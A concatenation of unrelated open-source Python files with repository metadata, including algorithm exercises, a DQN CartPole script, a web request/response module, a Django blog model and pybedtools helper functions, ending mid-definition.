context = self.process_parameters(self.processor, self.template_parameters, argument_values)
html_string = self.template.render(context)
parser = HtmlParser()
parser.feed(html_string).close()
parent.append(parser.get_root())
def custom_parsing(self, argument_values):
'''
This serves as a placeholder method, to be used by processes that use the
GenericTagBlockProcessor but need to carry out further parsing of
the block's contents.
Args:
argument_values: Dictionary of values to be inserted in template.
Returns:
Tuple containing content_blocks (unchanged) and empty dictionary.
'''
return {}
| 38.376471 | 112 | 0.640405 |
25020dbdf664c4300255a8453c4f9d1b0a94b026
| 598 |
py
|
Python
|
string_manipulation/longest_palindrome_substring.py
|
daesookimds/Algorithm
|
76f4cbfe9000e8c1736f470138499e7c735fecaa
|
[
"MIT"
] | null | null | null |
string_manipulation/longest_palindrome_substring.py
|
daesookimds/Algorithm
|
76f4cbfe9000e8c1736f470138499e7c735fecaa
|
[
"MIT"
] | null | null | null |
string_manipulation/longest_palindrome_substring.py
|
daesookimds/Algorithm
|
76f4cbfe9000e8c1736f470138499e7c735fecaa
|
[
"MIT"
] | null | null | null |
def longest_palindrome(s: str) -> str:
def expand(left: int, right: int) -> str:
while left >= 0 and right < len(s) and s[left] == s[right]:
left -= 1
right += 1
return s[left + 1:right]
if len(s) < 2 or s == s[::-1]:
return s
result = ''
for i in range(len(s)-1):
result = max(result, expand(i, i+1), expand(i, i+2), key=len)
return result
def test_case():
case1 = 'babad'
case2 = 'cbbd'
result1 = longest_palindrome(case1)
print(result1)
result2 = longest_palindrome(case2)
print(result2)
| 22.148148 | 69 | 0.545151 |
c2655760805efbcbf83e25a201933c3ac4906ce6
| 754 |
py
|
Python
|
iwwb-download.py
|
maximiliankolb/iwwb-qm
|
2a67c3ec3976b8de6532100ad27d4f5c91b31890
|
[
"BSD-3-Clause"
] | null | null | null |
iwwb-download.py
|
maximiliankolb/iwwb-qm
|
2a67c3ec3976b8de6532100ad27d4f5c91b31890
|
[
"BSD-3-Clause"
] | null | null | null |
iwwb-download.py
|
maximiliankolb/iwwb-qm
|
2a67c3ec3976b8de6532100ad27d4f5c91b31890
|
[
"BSD-3-Clause"
] | null | null | null |
# parse json file to retrieve qm & download individual results to iwwb-qm/
# 2019-05-13 by maximilian
import urllib.request
from datetime import datetime
import json
import time
pathJson = 'iwwb-source.json'
pathFolder = 'iwwb-qm/'
json_file = open(pathJson, 'r')
json_file_content = json_file.read()
json_arrays = json.loads(json_file_content)
for quali in json_arrays['qm']:
myFilenameDate = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
myQmTitle = str(quali['qmTitel'])
myFilename = myFilenameDate + '_' + myQmTitle + '.html'
myDownloadPath = pathFolder + myFilename
myUrl = quali['qmQuelle']
print(myUrl, myDownloadPath)
time.sleep(1)
try:
urllib.request.urlretrieve(myUrl, myDownloadPath)
except Exception:
print ('error', myUrl)
| 25.133333 | 74 | 0.738727 |
6c034a7ca2ece6dadf69c287cd0ea8bbdf097bc4
| 1,390 |
py
|
Python
|
Packs/CortexXDR/Scripts/DBotGroupXDRIncidents/DBotGroupXDRIncidents.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CortexXDR/Scripts/DBotGroupXDRIncidents/DBotGroupXDRIncidents.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CortexXDR/Scripts/DBotGroupXDRIncidents/DBotGroupXDRIncidents.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *
model_name = 'xdr_clustering'
field_for_grouping = 'xdralerts'
field_for_name = 'xdralerts.causalityactorprocessimagename'
return_type = demisto.args()['returnWidgetType']
if return_type == 'incidents':
res = demisto.executeCommand('DBotShowClusteringModelInfo', {
'searchQuery': demisto.args().get('searchQuery'),
'modelName': model_name,
'returnType': 'incidents',
'fieldsToDisplay': demisto.args().get('fieldsToDisplay')
})
demisto.results(res)
elif return_type == 'summary':
res = demisto.executeCommand('DBotShowClusteringModelInfo', {
'modelName': model_name
})
demisto.results(res)
else:
args = demisto.args()
res = demisto.executeCommand('DBotTrainClustering', {
'modelName': model_name,
'type': demisto.args().get('incidentType'),
'fromDate': demisto.args().get('fromDate'),
'limit': demisto.args().get('limit'),
'fieldsForClustering': field_for_grouping,
'fieldForClusterName': field_for_name,
'storeModel': 'True',
'searchQuery': demisto.args().get('searchQuery'),
'forceRetrain': demisto.args().get('forceRetrain'),
'numberOfFeaturesPerField': 500
})
# we need only the last entry because it's a widget script, and only the widget info should be return
demisto.results(res[-1])
| 36.578947 | 105 | 0.671942 |
666a35029fe3a6fb6d772f9feb33f0dc101dda36
| 1,205 |
py
|
Python
|
DataStructures/DisjoinSet/Communities.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/DisjoinSet/Communities.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/DisjoinSet/Communities.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
#coding:utf-8
def find(disjoin_set, i):
if disjoin_set[i] <= -1:
return i
else:
disjoin_set[i] = find(disjoin_set, disjoin_set[i])
return disjoin_set[i]
N, Q = map(int, raw_input().split())
disjoin_set = [-1] * (N+1)
for _ in xrange(Q):
s = raw_input()
if s.startswith('Q'):
i = int(s.split()[1])
#递归路径压缩
i = find(disjoin_set, i)
'''
#循环找根,如果要实现路径压缩,要把所有父节点不为根的节点记录下来,最后统一替换为根节点,因为循环过程中还不知道根节点在哪里。
while disjoin_set[i] > -1:
i = disjoin_set[i]
'''
print abs(disjoin_set[i])
elif s.startswith('M'):
i, j = map(int, s.split()[1:])
#在union操作中find,可以顺便路径压缩
i = find(disjoin_set, i)
j = find(disjoin_set, j)
'''
while disjoin_set[i] > -1:
i = disjoin_set[i]
while disjoin_set[j] > -1:
j = disjoin_set[j]
'''
if i == j:
continue
if abs(disjoin_set[i]) > abs(disjoin_set[j]):
disjoin_set[i] += disjoin_set[j]
disjoin_set[j] = i
else:
disjoin_set[j] += disjoin_set[i]
disjoin_set[i] = j
| 23.173077 | 71 | 0.495436 |
dd7aeba908670838be98b1a649a4354c13cd0ecd
| 1,456 |
py
|
Python
|
DQN/CartPole/run_this.py
|
pickxiguapi/rl-algorithm
|
a57991acd178077fd7f51bcd4ae2ee58492475c2
|
[
"MIT"
] | 2 |
2021-01-06T09:45:23.000Z
|
2021-04-21T09:39:14.000Z
|
DQN/CartPole/run_this.py
|
pickxiguapi/rl-algorithm
|
a57991acd178077fd7f51bcd4ae2ee58492475c2
|
[
"MIT"
] | null | null | null |
DQN/CartPole/run_this.py
|
pickxiguapi/rl-algorithm
|
a57991acd178077fd7f51bcd4ae2ee58492475c2
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
@File : run_this.py
@Time : 2020/12/4
@Author : Yuan Yifu
"""
import gym
from DQN_brain import DQN
env = gym.make('CartPole-v0')
env = env.unwrapped
# print(env.action_space.n) 2
# print(env.observation_space.shape[0]) 4
dqn = DQN()
MEMORY_CAPACITY = 2000
def run():
print('\nCollecting experience...\n')
for i_episode in range(400): # repeat for each episode in episodes
s = env.reset() # get start s of start state S
ep_r = 0
while True: # repeat for each step of episode
env.render()
a = dqn.choose_action(s) # choose action
# take action
s_, r, done, info = env.step(a)
# modify the reward
x, x_dot, theta, theta_dot = s_
r1 = (env.x_threshold - abs(x)) / env.x_threshold - 0.8
r2 = (env.theta_threshold_radians - abs(theta)) / env.theta_threshold_radians - 0.5
r = r1 + r2
# store transition in buffer
dqn.store_transition(s, a, r, s_)
ep_r += r
if dqn.memory_counter > MEMORY_CAPACITY:
dqn.learn()
if done:
print('Ep: ', i_episode,
'| Ep_r: ', round(ep_r, 2))
if done:
# until S is terminal state
break
# get next state
s = s_
if __name__ == '__main__':
run()
| 26.472727 | 95 | 0.521978 |
06d8652b894df20c7913bdd4dc7ba0de4d356eea
| 8,955 |
py
|
Python
|
brick/http.py
|
xsank/bottle
|
4c228043ea31811fffd8eb30914d025c1fd43dc0
|
[
"MIT"
] | 9 |
2015-01-06T01:32:43.000Z
|
2017-03-01T18:34:54.000Z
|
brick/http.py
|
jude90/bottle
|
4c228043ea31811fffd8eb30914d025c1fd43dc0
|
[
"MIT"
] | null | null | null |
brick/http.py
|
jude90/bottle
|
4c228043ea31811fffd8eb30914d025c1fd43dc0
|
[
"MIT"
] | 4 |
2015-02-05T09:48:43.000Z
|
2016-02-22T15:04:35.000Z
|
'''
Created on 2013-4-21
@author: Xsank
'''
import cgi
from Cookie import SimpleCookie
from StringIO import StringIO
from tempfile import TemporaryFile
from urllib import quote as urlquote
from urlparse import urlunsplit,parse_qs
from structure import HeaderDict,MultiDict
from util import depr,path_shift,parse_auth,cookie_decode,cookie_encode
from config import MEMFILE_MAX
class Request(object):
def __init__(self, environ=None, config=None):
self.bind(environ or {}, config)
def bind(self, environ, config=None):
self.environ = environ
self.config = config or {}
self.path = '/' + environ.get('PATH_INFO', '/').lstrip('/')
self.method = environ.get('REQUEST_METHOD', 'GET').upper()
@property
def _environ(self):
depr("Request._environ renamed to Request.environ")
return self.environ
def copy(self):
return Request(self.environ.copy(), self.config)
def path_shift(self, shift=1):
script_name = self.environ.get('SCRIPT_NAME','/')
self['SCRIPT_NAME'], self.path = path_shift(script_name, self.path, shift)
self['PATH_INFO'] = self.path
def __getitem__(self, key): return self.environ[key]
def __delitem__(self, key): self[key] = ""; del(self.environ[key])
def __iter__(self): return iter(self.environ)
def __len__(self): return len(self.environ)
def keys(self): return self.environ.keys()
def __setitem__(self, key, value):
self.environ[key] = value
todelete = []
if key in ('PATH_INFO','REQUEST_METHOD'):
self.bind(self.environ, self.config)
elif key == 'wsgi.input': todelete = ('body','forms','files','params')
elif key == 'QUERY_STRING': todelete = ('get','params')
elif key.startswith('HTTP_'): todelete = ('headers', 'cookies')
for key in todelete:
if 'brick.' + key in self.environ:
del self.environ['brick.' + key]
@property
def query_string(self):
return self.environ.get('QUERY_STRING', '')
@property
def fullpath(self):
return self.environ.get('SCRIPT_NAME', '').rstrip('/') + self.path
@property
def url(self):
scheme = self.environ.get('wsgi.url_scheme', 'http')
host = self.environ.get('HTTP_X_FORWARDED_HOST', self.environ.get('HTTP_HOST', None))
if not host:
host = self.environ.get('SERVER_NAME')
port = self.environ.get('SERVER_PORT', '80')
if scheme + port not in ('https443', 'http80'):
host += ':' + port
parts = (scheme, host, urlquote(self.fullpath), self.query_string, '')
return urlunsplit(parts)
@property
def content_length(self):
return int(self.environ.get('CONTENT_LENGTH','') or -1)
@property
def header(self):
if 'brick.headers' not in self.environ:
header = self.environ['brick.headers'] = HeaderDict()
for key, value in self.environ.iteritems():
if key.startswith('HTTP_'):
key = key[5:].replace('_','-').title()
header[key] = value
return self.environ['brick.headers']
@property
def GET(self):
if 'brick.get' not in self.environ:
data = parse_qs(self.query_string, keep_blank_values=True)
get = self.environ['brick.get'] = MultiDict()
for key, values in data.iteritems():
for value in values:
get[key] = value
return self.environ['brick.get']
@property
def POST(self):
if 'brick.post' not in self.environ:
self.environ['brick.post'] = MultiDict()
self.environ['brick.forms'] = MultiDict()
self.environ['brick.files'] = MultiDict()
safe_env = {'QUERY_STRING':''}
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
fb = self.body
data = cgi.FieldStorage(fp=fb, environ=safe_env, keep_blank_values=True)
for item in data.list or []:
if item.filename:
self.environ['brick.post'][item.name] = item
self.environ['brick.files'][item.name] = item
else:
self.environ['brick.post'][item.name] = item.value
self.environ['brick.forms'][item.name] = item.value
return self.environ['brick.post']
@property
def forms(self):
if 'brick.forms' not in self.environ: self.POST
return self.environ['brick.forms']
@property
def files(self):
if 'brick.files' not in self.environ: self.POST
return self.environ['brick.files']
@property
def params(self):
""" A combined MultiDict with POST and GET parameters. """
if 'brick.params' not in self.environ:
self.environ['brick.params'] = MultiDict(self.GET)
self.environ['brick.params'].update(dict(self.forms))
return self.environ['brick.params']
@property
def body(self):
if 'brick.body' not in self.environ:
maxread = max(0, self.content_length)
stream = self.environ['wsgi.input']
body = StringIO() if maxread < MEMFILE_MAX else TemporaryFile(mode='w+b')
while maxread > 0:
part = stream.read(min(maxread, MEMFILE_MAX))
if not part:
break
body.write(part)
maxread -= len(part)
self.environ['wsgi.input'] = body
self.environ['brick.body'] = body
self.environ['brick.body'].seek(0)
return self.environ['brick.body']
@property
def auth(self):
return parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
@property
def COOKIES(self):
if 'brick.cookies' not in self.environ:
raw_dict = SimpleCookie(self.environ.get('HTTP_COOKIE',''))
self.environ['brick.cookies'] = {}
for cookie in raw_dict.itervalues():
self.environ['brick.cookies'][cookie.key] = cookie.value
return self.environ['brick.cookies']
def get_cookie(self, name, secret=None):
value = self.COOKIES.get(name)
dec = cookie_decode(value, secret) if secret else None
return dec or value
@property
def is_ajax(self):
return self.header.get('X-Requested-With') == 'XMLHttpRequest'
class Response(object):
def __init__(self, config=None):
self.bind(config)
def bind(self, config=None):
self._COOKIES = None
self.status = 200
self.headers = HeaderDict()
self.content_type = 'text/html; charset=UTF-8'
self.config = config or {}
@property
def header(self):
depr("Response.header renamed to Response.headers")
return self.headers
def copy(self):
copy = Response(self.config)
copy.status = self.status
copy.headers = self.headers.copy()
copy.content_type = self.content_type
return copy
def wsgiheader(self):
for c in self.COOKIES.values():
if c.OutputString() not in self.headers.getall('Set-Cookie'):
self.headers.append('Set-Cookie', c.OutputString())
if self.status in (204, 304) and 'content-type' in self.headers:
del self.headers['content-type']
if self.status == 304:
for h in ('allow', 'content-encoding', 'content-language',
'content-length', 'content-md5', 'content-range',
'content-type', 'last-modified'):
if h in self.headers:
del self.headers[h]
return list(self.headers.iterallitems())
headerlist = property(wsgiheader)
@property
def charset(self):
if 'charset=' in self.content_type:
return self.content_type.split('charset=')[-1].split(';')[0].strip()
return 'UTF-8'
@property
def COOKIES(self):
if not self._COOKIES:
self._COOKIES = SimpleCookie()
return self._COOKIES
def set_cookie(self, key, value, secret=None, **kargs):
if not isinstance(value, basestring):
if not secret:
raise TypeError('Cookies must be strings when secret is not set')
value = cookie_encode(value, secret).decode('ascii')
self.COOKIES[key] = value
for k, v in kargs.iteritems():
self.COOKIES[key][k.replace('_', '-')] = v
def get_content_type(self):
return self.headers['Content-Type']
def set_content_type(self, value):
self.headers['Content-Type'] = value
content_type = property(get_content_type, set_content_type, None,
get_content_type.__doc__)
| 34.980469 | 95 | 0.590061 |
664012185793a3a146ab60fac8af78377b0a4aa0
| 2,141 |
py
|
Python
|
website/apps/blog/models.py
|
stahlnow/stahlnow
|
265dd46c54f68173071d1c86218201d6e618ceeb
|
[
"MIT"
] | 1 |
2017-03-14T08:08:31.000Z
|
2017-03-14T08:08:31.000Z
|
website/apps/blog/models.py
|
stahlnow/stahlnow
|
265dd46c54f68173071d1c86218201d6e618ceeb
|
[
"MIT"
] | null | null | null |
website/apps/blog/models.py
|
stahlnow/stahlnow
|
265dd46c54f68173071d1c86218201d6e618ceeb
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.utils.timezone import now
from blog.managers import PublicManager
from taggit.managers import TaggableManager
class Category(models.Model):
"""Category model."""
title = models.CharField(_('title'), max_length=100)
slug = models.SlugField(_('slug'), unique=True)
class Meta:
verbose_name = _('category')
verbose_name_plural = _('categories')
db_table = 'blog_categories'
ordering = ('title',)
def __unicode__(self):
return u'%s' % self.title
class Post(models.Model):
"""Post model."""
STATUS_CHOICES = (
(1, _('Draft')),
(2, _('Public')),
)
title = models.CharField(_('title'), max_length=200)
slug = models.SlugField(_('slug'), unique_for_date='publish')
author = models.ForeignKey(User)
body = models.TextField(_('body'), )
tease = models.TextField(
_('tease'),
blank=True,
help_text=_('Concise text suggested. Does not appear in RSS feed.'))
status = models.IntegerField(
_('status'), choices=STATUS_CHOICES, default=2)
allow_comments = models.BooleanField(_('allow comments'), default=True)
publish = models.DateTimeField(_('publish'), default=now)
created = models.DateTimeField(_('created'), auto_now_add=True)
modified = models.DateTimeField(_('modified'), auto_now=True)
categories = models.ManyToManyField(Category)
tags = TaggableManager()
objects = PublicManager()
class Meta:
verbose_name = _('post')
verbose_name_plural = _('posts')
db_table = 'blog_posts'
ordering = ('-publish',)
get_latest_by = 'publish'
def __unicode__(self):
return u'%s' % self.title
@models.permalink
def get_absolute_url(self):
return 'post_detail', (), {'slug': self.slug}
def get_previous_post(self):
return self.get_previous_by_publish(status__gte=2)
def get_next_post(self):
return self.get_next_by_publish(status__gte=2)
| 29.328767 | 76 | 0.658104 |
665138419969a4a1e38c6a6260c09958fdc447bb
| 21,821 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pybedtools-0.7.6-py2.7-linux-x86_64.egg/pybedtools/helpers.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pybedtools-0.7.6-py2.7-linux-x86_64.egg/pybedtools/helpers.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pybedtools-0.7.6-py2.7-linux-x86_64.egg/pybedtools/helpers.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
from __future__ import print_function
import sys
import os
import tempfile
import subprocess
import random
import string
import glob
import struct
import atexit
import six
import pysam
from six.moves import urllib
from . import cbedtools
from . import settings
from . import filenames
from . import genome_registry
from .logger import logger
from .cbedtools import create_interval_from_list
BUFSIZE = 1
_tags = {}
def _check_for_bedtools(program_to_check='intersectBed', force_check=False):
"""
Checks installation as well as version (based on whether or not "bedtools
intersect" works, or just "intersectBed")
"""
if settings._bedtools_installed and not force_check:
return True
try:
p = subprocess.Popen(
[os.path.join(settings._bedtools_path, 'bedtools'),
settings._prog_names[program_to_check]],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
settings._bedtools_installed = True
settings._v_2_15_plus = True
except (OSError, KeyError) as err:
try:
p = subprocess.Popen(
[os.path.join(settings._bedtools_path, program_to_check)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
settings._bedtools_installed = True
settings._v_2_15_plus = False
except OSError as err:
if err.errno == 2:
if settings._bedtools_path:
add_msg = "(tried path '%s')" % settings._bedtools_path
else:
add_msg = ""
raise OSError("Please make sure you have installed BEDTools"
"(https://github.com/arq5x/bedtools) and that "
"it's on the path. %s" % add_msg)
def _check_for_R():
try:
p = subprocess.Popen(
[os.path.join(settings._R_path, 'R'), '--version'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
settings._R_installed = True
except OSError:
if settings._R_path:
add_msg = "(tried path '%s')" % settings._R_path
else:
add_msg = ""
raise ValueError(
'Please install R and ensure it is on your path %s' % add_msg)
class Error(Exception):
"""Base class for this module's exceptions"""
pass
class BEDToolsError(Error):
def __init__(self, cmd, msg):
self.cmd = str(cmd)
self.msg = str(msg)
def __str__(self):
m = '\nCommand was:\n\n\t' + self.cmd + '\n' + \
'\nError message was:\n' + self.msg
return m
def isGZIP(fn):
with open(fn, 'rb') as f:
start = f.read(3)
if start == b"\x1f\x8b\x08":
return True
return False
def isBGZIP(fn):
"""
Reads a filename to see if it's a BGZIPed file or not.
"""
header_str = open(fn, 'rb').read(15)
if len(header_str) < 15:
return False
header = struct.unpack_from('BBBBiBBHBBB', header_str)
id1, id2, cm, flg, mtime, xfl, os_, xlen, si1, si2, slen = header
if (id1 == 31) and (id2 == 139) and (cm == 8) and (flg == 4) and \
(si1 == 66) and (si2 == 67) and (slen == 2):
return True
return False
def isBAM(fn):
if not isBGZIP(fn):
return False
# Need to differentiate between BAM and plain 'ol BGZIP. Try reading header
# . . .
try:
pysam.Samfile(fn, 'rb')
return True
except ValueError:
return False
def find_tagged(tag):
"""
Returns the bedtool object with tagged with *tag*. Useful for tracking
down bedtools you made previously.
"""
for key, item in _tags.items():
try:
if item._tag == tag:
return item
except AttributeError:
pass
raise ValueError('tag "%s" not found' % tag)
def _flatten_list(x):
nested = True
while nested:
check_again = False
flattened = []
for element in x:
if isinstance(element, list):
flattened.extend(element)
check_again = True
else:
flattened.append(element)
nested = check_again
x = flattened[:]
return x
def set_tempdir(tempdir):
"""
Set the directory for temp files.
Useful for clusters that use a /scratch partition rather than a /tmp dir.
Convenience function to simply set tempfile.tempdir.
"""
if not os.path.exists(tempdir):
errstr = 'The tempdir you specified, %s, does not exist' % tempdir
raise ValueError(errstr)
tempfile.tempdir = tempdir
def get_tempdir():
"""
Gets the current tempdir for the module.
"""
return tempfile.gettempdir()
def cleanup(verbose=False, remove_all=False):
"""
Deletes all temp files from the current session (or optionally *all* \
sessions)
If *verbose*, reports what it's doing
If *remove_all*, then ALL files matching "pybedtools.*.tmp" in the temp dir
will be deleted.
"""
if settings.KEEP_TEMPFILES:
return
for fn in filenames.TEMPFILES:
if verbose:
print('removing', fn)
if os.path.exists(fn):
os.unlink(fn)
if remove_all:
fns = glob.glob(os.path.join(get_tempdir(), 'pybedtools.*.tmp'))
for fn in fns:
os.unlink(fn)
def _version_2_15_plus_names(prog_name):
if not settings._bedtools_installed:
_check_for_bedtools()
if not settings._v_2_15_plus:
return [prog_name]
try:
prog_name = settings._prog_names[prog_name]
except KeyError:
if prog_name in settings._new_names:
pass
raise BEDToolsError(
prog_name, prog_name + 'not a recognized BEDTools program')
return [os.path.join(settings._bedtools_path, 'bedtools'), prog_name]
def call_bedtools(cmds, tmpfn=None, stdin=None, check_stderr=None, decode_output=True, encode_input=True):
"""
Use subprocess.Popen to call BEDTools and catch any errors.
Output goes to *tmpfn*, or, if None, output stays in subprocess.PIPE and
can be iterated over.
*stdin* is an optional file-like object that will be sent to
subprocess.Popen.
Prints some useful help upon getting common errors.
*check_stderr* is a function that takes the stderr string as input and
returns True if it's OK (that is, it's not really an error). This is
needed, e.g., for calling fastaFromBed which will report that it has to
make a .fai for a fasta file.
*decode_output* should be set to False when you are iterating over a BAM
file, where the data represent binary rather than text data.
"""
input_is_stream = stdin is not None
output_is_stream = tmpfn is None
_orig_cmds = cmds[:]
cmds = []
cmds.extend(_version_2_15_plus_names(_orig_cmds[0]))
cmds.extend(_orig_cmds[1:])
try:
# coming from an iterator, sending as iterator
if input_is_stream and output_is_stream:
logger.debug(
'helpers.call_bedtools(): input is stream, output is '
'stream')
logger.debug(
'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
p = subprocess.Popen(cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
bufsize=BUFSIZE)
if encode_input:
for line in stdin:
p.stdin.write(line.encode())
else:
for line in stdin:
p.stdin.write(line)
# This is important to prevent deadlocks
p.stdin.close()
if decode_output:
output = (i.decode('UTF-8') for i in p.stdout)
else:
output = (i for i in p.stdout)
stderr = None
# coming from an iterator, writing to file
if input_is_stream and not output_is_stream:
logger.debug(
'helpers.call_bedtools(): input is stream, output is file')
logger.debug(
'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
outfile = open(tmpfn, 'wb')
p = subprocess.Popen(cmds,
stdout=outfile,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
bufsize=BUFSIZE)
if hasattr(stdin, 'read'):
stdout, stderr = p.communicate(stdin.read())
else:
for item in stdin:
p.stdin.write(item.encode())
stdout, stderr = p.communicate()
output = tmpfn
outfile.close()
# coming from a file, sending as iterator
if not input_is_stream and output_is_stream:
logger.debug(
'helpers.call_bedtools(): input is filename, '
'output is stream')
logger.debug(
'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
p = subprocess.Popen(cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=BUFSIZE)
if decode_output:
output = (i.decode('UTF-8') for i in p.stdout)
else:
output = (i for i in p.stdout)
stderr = None
# file-to-file
if not input_is_stream and not output_is_stream:
logger.debug(
'helpers.call_bedtools(): input is filename, output '
'is filename (%s)', tmpfn)
logger.debug(
'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
outfile = open(tmpfn, 'wb')
p = subprocess.Popen(cmds,
stdout=outfile,
stderr=subprocess.PIPE,
bufsize=BUFSIZE)
stdout, stderr = p.communicate()
output = tmpfn
outfile.close()
# Check if it's OK using a provided function to check stderr. If it's
# OK, dump it to sys.stderr so it's printed, and reset it to None so we
# don't raise an exception
if check_stderr is not None:
if isinstance(stderr, bytes):
stderr = stderr.decode('UTF_8')
if check_stderr(stderr):
sys.stderr.write(stderr)
stderr = None
if stderr:
# Fix for issue #147. In general, we consider warnings to not be
# fatal, so just show 'em and continue on.
#
# bedtools source has several different ways of showing a warning,
# but they seem to all have "WARNING" in the first 20 or so
# characters
if isinstance(stderr, bytes):
stderr = stderr.decode('UTF_8')
if len(stderr) > 20 and "WARNING" in stderr[:20]:
sys.stderr.write(stderr)
else:
raise BEDToolsError(subprocess.list2cmdline(cmds), stderr)
except (OSError, IOError) as err:
print('%s: %s' % (type(err), os.strerror(err.errno)))
print('The command was:\n\n\t%s\n' % subprocess.list2cmdline(cmds))
problems = {
2: ('* Did you spell the command correctly?',
'* Do you have BEDTools installed and on the path?'),
13: ('* Do you have permission to write '
'to the output file ("%s")?' % tmpfn,),
24: ('* Too many files open -- please submit '
'a bug report so that this can be fixed',)
}
print('Things to check:')
print('\n\t' + '\n\t'.join(problems[err.errno]))
raise OSError('See above for commands that gave the error')
return output
def set_bedtools_path(path=""):
"""
Explicitly set path to `BEDTools` installation dir.
If BEDTools is not available on your system path, specify the path to the
dir containing the BEDTools executables (intersectBed, subtractBed, etc)
with this function.
To reset and use the default system path, call this function with no
arguments or use path="".
"""
settings._bedtools_path = path
def set_R_path(path=""):
"""
Explicitly set path to `R` installation dir.
If R is not available on the path, then it can be explicitly
specified here.
Use path="" to reset to default system path.
"""
settings._R_path = path
def _check_sequence_stderr(x):
"""
If stderr created by fastaFromBed starts with 'index file', then don't
consider it an error.
"""
if isinstance(x, bytes):
x = x.decode('UTF-8')
if x.startswith('index file'):
return True
if x.startswith("WARNING"):
return True
return False
def _call_randomintersect(_self, other, iterations, intersect_kwargs,
shuffle_kwargs, report_iterations, debug,
_orig_processes):
"""
Helper function that list-ifies the output from randomintersection, s.t.
it can be pickled across a multiprocess Pool.
"""
return list(
_self.randomintersection(
other, iterations,
intersect_kwargs=intersect_kwargs,
shuffle_kwargs=shuffle_kwargs,
report_iterations=report_iterations,
debug=False, processes=None,
_orig_processes=_orig_processes)
)
def close_or_delete(*args):
"""
Single function that can be used to get rid of a BedTool, whether it's a
streaming or file-based version.
"""
for x in args:
if isinstance(x.fn, six.string_types):
os.unlink(x.fn)
elif hasattr(x.fn, 'close'):
x.fn.close()
if hasattr(x.fn, 'throw'):
x.fn.throw(StopIteration)
def n_open_fds():
pid = os.getpid()
procs = subprocess.check_output(
['lsof', '-w', '-Ff', '-p', str(pid)])
nprocs = 0
for i in procs.splitlines():
if i[1:].isdigit() and i[0] == 'f':
nprocs += 1
return nprocs
import re
coord_re = re.compile(
r"""
(?P<chrom>.+):
(?P<start>\d+)-
(?P<stop>\d+)
(?:\[(?P<strand>.)\])?""", re.VERBOSE)
def string_to_interval(s):
"""
Convert string of the form "chrom:start-stop" or "chrom:start-stop[strand]"
to an interval.
Assumes zero-based coords.
If it's already an interval, then return it as-is.
"""
if isinstance(s, six.string_types):
m = coord_re.search(s)
if m.group('strand'):
return create_interval_from_list([
m.group('chrom'),
m.group('start'),
m.group('stop'),
'.',
'0',
m.group('strand')])
else:
return create_interval_from_list([
m.group('chrom'),
m.group('start'),
m.group('stop'),
])
return s
class FisherOutput(object):
def __init__(self, s, **kwargs):
"""
fisher returns text results like::
# Contingency Table
#_________________________________________
# | not in -b | in -b |
# not in -a | 3137160615 | 503 |
# in -a | 100 | 46 |
#_________________________________________
# p-values for fisher's exact test
left right two-tail ratio
1.00000 0.00000 0.00000 2868973.922
"""
if isinstance(s, str):
s = open(s).read()
if hasattr(s, 'next'):
s = ''.join(i for i in s)
table = {
'not in -a': {
'not in -b': None,
'in -b': None
},
'in -a': {
'not in -b': None,
'in -b': None,
},
}
self.text = s
lines = s.splitlines()
for i in lines:
if 'not in -a' in i:
_, in_b, not_in_b, _= i.strip().split('|')
table['not in -a']['not in -b'] = int(not_in_b)
table['not in -a']['in -b'] = int(in_b)
if ' in -a' in i:
_, in_b, not_in_b, _ = i.strip().split('|')
table['in -a']['not in -b'] = int(not_in_b)
table['in -a']['in -b'] = int(in_b)
self.table = table
left, right, two_tail, ratio = lines[-1].split()
self.left_tail = float(left)
self.right_tail = float(right)
self.two_tail = float(two_tail)
self.ratio = float(ratio)
def __str__(self):
return self.text
def __repr__(self):
return '<%s at %s>\n%s' % (self.__class__.__name__, id(self), self.text)
def internet_on(timeout=1):
